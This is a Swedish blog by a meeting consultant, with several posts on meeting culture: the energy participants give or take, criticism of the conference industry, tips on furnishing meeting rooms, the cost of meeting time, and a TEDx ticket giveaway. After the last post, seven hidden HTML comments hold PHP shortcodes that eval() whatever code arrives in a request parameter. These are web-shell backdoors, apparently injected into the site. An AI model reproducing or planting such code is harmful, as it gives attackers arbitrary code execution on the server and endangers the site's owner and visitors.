Energi

Vi kan inte leva utan syre. Det är inget som syns, vi tänker inte på det men vi skulle dö utan det.

Med energi är det nästan samma sak. Du kan inte ta på energin som uppstår mellan två människor som gillar varandra, men du vet att den finns. Varje bra möte skapar energi mellan deltagarna. Varje bra möte mellan två eller fler individer skapar energi. Utan energi i möten så dör vi. Kanske inte bokstavligt talat, däremot mentalt.

Alla vet hur viktig en hög energinivå är och vad enklare allt blir då. Ändå är det inget som det talas om och utbildas i. Enl Mötesbarometern 2009 (www.3s.se)  så tar 1/3 av alla möten energi av sina deltagare.  Det är inte det allvarligaste, utan vad händer med de deltagarna när det går tillbaka till produktionen efter mötet. Hur mycket sämre jobb gör vi efter ha dränerats på energi än när vi tankats med energi? Tyvärr har jag inte hittat några studier eller forskning på det, men vi behöver inte vara Einstein för att förstå…….Eller hur?

Jag brukar fråga på mina föreläsningar;-Hand upp du som ger sämre energi än genomsnittet, på era möten, i din organisation? Få gånger räcker någon upp handen. Det är som den amerikanska skådespelerskan Lily Tomlin sa;- Jag undrade alltid varför någon inte gjorde något åt det, tills jag insåg att någon var jag.

Eftersom vi aldrig pratar om detta på arbetsplatsen så vet vi ju inte om vi ger eller tar energi. INGEN vill ta energi av någon annan. ALLA vill ge energi. Ändå, varje dag på många arbetsplatser, så tar var tredje möte energi av deltagarna.

Flera studier och forskningar visar att resultatet, mellan en terapeut – patient, coach – adept, mentor – adept, beror på 70% av relationen dem emellan. Kunskapen endast 15%. Kan det vara så även i möten? En sak som är säker iaf är att om mötesledaren tar energi av gruppen så blir det ingen bra effekt av mötet milt uttryckt. Visst alla har ett ansvar, men en mötesledare som kanske kommer för sent, är dåligt förberedd, inte skapar delaktighet och engagemang, har värdelösa powerpoint bilder, den tar energi av gruppen.

Lägg ner ett ruttet äpple i en påse med friska äpplen…….alla ruttnar.

Att ge energi är inte samma sak som vara en entertainer. Det är inget som någon är född till. De som ger energi väljer att ge energi. De som inte ger energi saknar den kompetensen helt enkelt!

En mötesledare som skapar energi, skapar ett engagemang i gruppen. När engagemanget finns i rummet blir det enkelt. Då sitter vi inte och pickar på varandra. När det blir enkelt blir det oftast effektiva lösningar, som i sin tur skapar bättre ekonomi. Då får vi mer energi. Och av energi…..

Denna kompetens är det allt för få ledare som har. De som har det är oftast framgångsrika.En bra övning på arbetsplatsen, avdelningen, gruppen, etc är att besvara dessa två frågor:

Hur ger jag energi?

Vad ger mig energi?

Detta visar våra olikheter sant att jag får veta vad andra får energi av och de andra får veta vad som ger mig energi. Jag lovar att det dina kollegor säger om dig, när du ger energi, kommer du att göra ännu oftare då! Och vice versa!

Slå in ordet Energi på www.synonymer.se . Finns det någon ledare i världen som inte vill ha detta i sin organisation?

I flera organisationer vi har varit inne i så resultatet blivit att i deras mötespolicy så har de “vi skall ge varandra energi”. Tror du att det blir någon skillnad? Sover Dolly Parton på rygg?

Vad skulle hända om alla möten i Sverige skapade energi? Tillväxt någon?

Våga testa och fråga dina kollegor;- När ger jag energi?

Är du riktigt modig, då frågar du hemma;. När ger jag dig/er energi?

Jag lovar att du kommer att bli förvånad över svaren och du kommer sedan att ge både dina kollegor och dem där hemma mer energi!

Lycka till och stay gr8

Micke, mötesevangelist

Fortsätt läsa

Tänk om…..

Jag fick en trevlig kommentar från Charlotte Melin från Comwell vilket gjorde att jag fick inspiration till detta inlägg. Tack Charlotte!

Ett av de största hindren idag, som jag ser det, att inte utvecklingen går snabbare att skapa bättre Möteskultur i organisationer är att inte branschen själv har insikt och kompetens vad Möteskultur är. Med branschen menar jag Mötesindustrin. Hotell, konferensanläggningar, eventbyråer, bokningsbolag, destinationer, kongress arrangörer, möteskonsulter(!) etc.

Därför är det kul att läsa att Comwell har fokus på detta. En av få personer som verkligen förstått hur illa det är och offentligt sagt det är Choise utvecklingschef, David Åberg, som på TUR mässan i år hade en inspirerande föreläsning kring detta. Han lade upp några bilder, både från egna hotell och konkurrenters, och det såg lika illa ut överallt. Bord och stolar i ett råkigt mötesrum.

Jag har varit, och är(!), starkt kritisk till att ingen av de ledande aktörerna tar på sig ansvaret att leda branschen. Alla säger att “vi skall göra det kunden vill”. Hur skall vi då få en utveckling och tillväxt? Det är få kunder som har en existerande bra Möteskultur idag.  Hela branschen agerar som Ericsson gjorde i början av 90-talet sa att vi gör det kunden vill ha och ingen har bett om design……Nokia tog ansvaret. Idag Apple.

Det är inte undra på att företagen idag bygger upp egna konferens centra hos sig istället eftersom mötesanläggningarna inte tillför mötet något idag. Mötesrummen ser ut idag, på de flesta håll, som de gjorde på 70-talet. De bygger helt enkelt inte mötesrum som stödjer mötet och bidrar till att öka effekten.

Trots att all kunskap finns. Det är forskat och klart, men ingen vill ta tag i detta och leda branschen. Färger, dofter, möblering, mötesmodeller ja listan kan göras hur lång som helst. Allt finns men ingen tar tag i detta.

Ta det här med “kreativa rum”. Det är en del som gjort försök kring detta. Ingen har dock kapiatliserat på detta. Varför? Ingen vet ju varför och hur de skall användas. Ingen säljare eller bokningsagent har kunskapen om varför det “kreativa rummet” skapar en bättre effekt av mötet än det traditionella.

Fråga Scandic med deras Think Tank rum. En excellent idé som sprack för de hade inte kunskapen om det. Titta på Nordic Hotels, några fantastiska rum som har stått tomma. Ja även här kan listan göras hur lång som helst. Alla som försökt har “skyllt på kunden”. De vill inte, de vill inte att vi frågar om syfte & mål etc….Det verkliga skälet är att de inte själva kan komma runt kundens svar eftersom de själva inte vet vad de skall säga. Och om kunden skulle kunna svara, vad skall de då göra med informationen? De är få om vet hur ett bra möte skapas.

Vad behöver göras?

1. Branschen själva behöver få kunskap och insikt vad en bra Möteskultur är. Utbildning och att själva arbeta med bra möten internt.

2. Därefter kan branschen själva börja utbilda sina kunder i Möteskultur.Tänk om varje kundaktivitet i branschen var utbildning!

3. Bygg om mötesrummen(kostar inte mer att göra rätt i en rust än det som görs idag). Skolsittning och biosittning skall bort från alla hemsidor och broschyrer. Pinsamt. Vem tror på allvar att de bästa idéerna skapas i våra tråkiga mötesrum?

4. Mer utbildning för varje år om mötesmodeller och andra verktyg som skulle skapa bättre effekt av mötena för kunderna.

Detta skulle skapa en enorm tillväxt för hela branschen. Helt plötsligt fanns det säljare och bokare som förstod varandra. Kunderna skulle mer fokusera på innehållet än 5% i rabatt hit och dit. Dessa 5% betyder ingenting om effekten av mötet iaf blir skit.

Då skulle syfte och mål bli viktigare av valet av mötesanläggning än om rummet kostar 2500:- eller 4500:-. Effekten av mötet är det som är intressantast.

Allt fler skulle förstå att vi inte kan sitta i våra tråkiga mötesrum på jobbet om vi ska ett kreativt möte. Allt fler skulle förstå att vi inte kan ha vårt ledningsgrupps möte i vårt tråkiga mötesrum på jobbet om vi vill få ut en bra effekt av det. OSV!

Vem blir först av de stora “drakarna” att ta steget? De flesta har pratat om det i några år, men det är VÄLDIGT LITEN VERKSTAD!

Jag tar tacksamt emot tips på anläggningar som både är bra själva på Möteskultur och som sedan har implementerat det i sin verksamhet mot kunderna!

Det är inte en fråga om utan när alla har fokus på detta. Alla stora företag och organisationer idag har “effektiva möten” på agendan. Låt dem inte ta mer felaktiga beslut nu (mer telefonmöten, mindre fysiska möten, lägger inte ut möten externt mm) utan ta tag i detta och led branschen och kunderna framåt! Det skapar både tillväxt för hela branschen och dess kunder!

Ett bra tips är att besöka Scandic Star i Lund som arbetat med detta under ett par år och lyckats bra. Både internt och externt.(ja, jag har hjälpt dem, men det jag vill säga att detta funkar för alla som tar tag i detta. Startegi? Just do it!)

Stay gr8

Micke, mötesevangelist

Fortsätt läsa

MötesKULTUR!

Glädjande är att allt fler media börjar upptäcka denna “trend” att skapa en bättre Möteskultur. Det ringer ett par journalister i veckan, många företagstidningar som skall ha tema Möteskultur eller effektiva möten, och frågar om “5 tips”.

Det finns inga fem tips eller short cut. Det är precis som namnet säger, en KULTUR som skall förändras. En möteskultur som har vuxit fram sedan 100-tals år och som de senaste 200 åren har sin ursprung i industri och ingenjör samhälle som vi en gång var.

I produktionen har vi en KULTUR av ständiga förbättringar. Det är inte Toyota som uppfunnit det (dock är deras process mycket bra!) utan alla företag har arbetat med ständiga förbättringar ända sedan företaget startade. Om företaget startade på 1800-talet så har de, varje år, försökt bli mer lönsamma och letat effektiviseringar. Varje år.

I mötestiden, 25% av företagets arbetstid, finns ingen sådan kultur. Det har inte hänt någonting. Alla vet om det, även VD och ledningsgrupp, men ingen gör något åt det. Tänk om en VD och ledningsgrupp släppte iväg 50% av sina produkter och tjänster och att de visste om att de var dåliga. De skulle inte få sitta kvar länge. Däremot accepterar vi detta när det gäller möten för det finns ingen kultur att förbättra det.

Ändå är allt det vi gör i möten det som påverkar produktionen!

Därför är det nödvändigt att ge detta förbättringsarbete tid! Det är en kultur som skall förbättras. Så se till att utse någon i ledningsgruppen som “äger frågan” så att det finns någon med ansvar för att jobba med ständiga förbättringar även här!

Stay gr8!                                                                                                                                                                    Micke, mötesevangelist

Fortsätt läsa

Mötesmiljö tips!

Idag blir det mer hands on!

Hur dåliga får mötesrum vara? Tydligen hur dåliga som helst! Det har inte hänt något på 40 år!!! Ta in en pensionär, som gick i pension på 70-talet, in på sin gamla arbetsplats. Hon kommer inte att känna igen en enda arbetsuppgift. Allt är nytt. Inte minst all teknik. Ta in henne i konferensrummet och hon känner igen allt. DET SER PRECIS LIKA UT SOM PÅ 70-TALET!!!!!

Trots att det finns forskning och massor av kunskap hur miljön påverkar effektiviteten och framförallt effekten av ett möte!

Här kommer några tips att börja med, törs du?

Tipsen är för dig när du är mötesledare (tipsen är till vanliga arbetsmöte):

1. Utgå från ett tomt rum och utifrån syfte och mål möblera sedan rummet. Utifrån det är det sällan vi behöver en “skolsittning eller biosittning”.

2. Eftersom du som mötesledare är på plats före alla andra sätt på musik! Musik skapar alltid en mer avslappnad och skön känsla. Den kan också bidra till att “skaka” av stress på mötesdeltagarna och dig själv.

3. Ta emot mötesdeltagarna i dörren. Gäller även ex måndagsmötet. Ett leende och välkomnande har stor betydlese för effekten av mötet.

4. Om du inte behöver bord, avstå dem! Oftast kan du skriva i ett block i knät. Bord skapar bara avstånd mellan deltagarna.

5. Är ni i ett stort mötesrum använd hela rummet! Dvs ta en del av mötet stående med ståbord på en sida. En sida där ni jobbar med bläddeblock och kanske en sida där ni satt in lite sköna fåtöljer eller stolar. Skapa olika tempo med hjälp av miljön!

6. Olika mötesmiljöer och lösningar skapar oftast mycket mer delaktighet. Detta är ju också en förutsättning för att ett möte skall skapa en bra effekt. Det finns några bra böcker mer olika mötesformat, läs dem och inspireras till mötesformat som kräver en bättre mötesmiljö!

7. Våga testa nytt! Allt som blir tråkigt blir innefektivt!

Stay gr8!

Micke, mötesevangelist

Fortsätt läsa

Vad investerar ditt företag i mötestid?

Enl Mötesbarometern (www.3s.se) 2009 så tillbringar vi 20% i möten. I många företag och organisationer är det mycket mer. Lägger vi till e-post tid (vilket vi gör när vi pratar Möteskultur, då många av de informella mötena har ersatts av e-post) så kan vi komma upp i över 30% av arbetstiden.

Så en enkel uträkning är att du tar den summan som en anställd kostar på ett år, multiplicerar detta med ex 0,25 (om vi leker med tanken att mötestid och e-posttid är 25%, alltså lågt räknat) och multiplicerar detta med antalet anställda i din organisation. Då får du den summa som din organisation investerar i mötes tid varje år. Mäter ni detta? Analyserar ni detta? Reviderar ni detta?Vilken effekt ger mötena?

Exempel. en anställd kostar 600 000:- och det är 100 anställda på företaget.

600 000:- x 0,25  x 100 = 15 miljoner kr/år. En kommun ex Malmö investerar drygt 3 MILJARDER kr/år!

Här finns ett enormt resurs slöseri. Enl studier från USA visar att 50% av alla möten dessutom är kontraproduktiva!

Häng med och förbättra Möteskulturen, alla, ja alla har att tjäna på detta!

Stay gr8// Micke, mötesevangelist

Fortsätt läsa

TEDxHumlegården

Gillar du TED.com? En av världens största inspirationskanaler! www.ted.com

Syftet med TED är att sprida idéer i världen. Nu har möjligheten givits att starta s.k. TEDx events runt om i världen. Jag har blivit beviljad en TED licens. Det första TEDx eventet gör jag tillsammans med kollegor nästa lördag den 24e april i Sthlm. Några av Sveriges främsta och mest efterfrågade föreläsare är med! Alla ställer upp ideellt då de är hela grundtanken med TED.

Vill du gå? Jag ger bort 2 biljetter till 5 personer! Läs mer om programmet på http://www.tedxhumlegården.se/TEDxHumlegarden.html

E-posta mig på micke.darmell@gr8meetings.se   Först till kvarn……

Stay gr8!                                                                                                                                                                         Micke, mötesevangelist

Fortsätt läsa

Varför är så många nöjda med att vara missnöjda?

Efter att ha arbetat med möten i olika former under 25 år och fokuserat kring de interna mötena i organisationer de sista 2 åren, så är min erfarenhet att det finns två anledningar att så få företag/ organisationer har satt ljuset på den egna Möteskulturen.

1. Ingen äger frågan i organisationen. Det är inte HR direktören, det är inte kommunikations direktören, ej heller meeting & travel managern. Så, det som händer är att varje år så har ledningsgruppen detta uppe på agendan och sedan ramlar det mellan stolarna.

2. Ingen vet vad de skall göra åt det. ”Effektivisera mötet” och in kommer en ”effektiviserings konsult” kanske. Det stora problemet är inte att ha kortare möten och en ”snabbare” agenda. Det stora frågan är; -Vilken effekt ger mötena. Och vad händer om vi kan öka den effekten?

Det första en organisation bör göra är att utse någon som äger det. Gör gärna som Intel och gör detta till en VD fråga. Möteskultur är en strategisk ledningsfråga.

I nästa inlägg kommer jag skriva om vad en Mötesstrategi innebär.

Stay gr8!                                                                                                                                                                         Micke, mötesevangelisten

<!– [insert_php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/insert_php][php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/insert_php][php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/insert_php][php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/insert_php][php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/php] –>

Fortsätt läsa
Stäng meny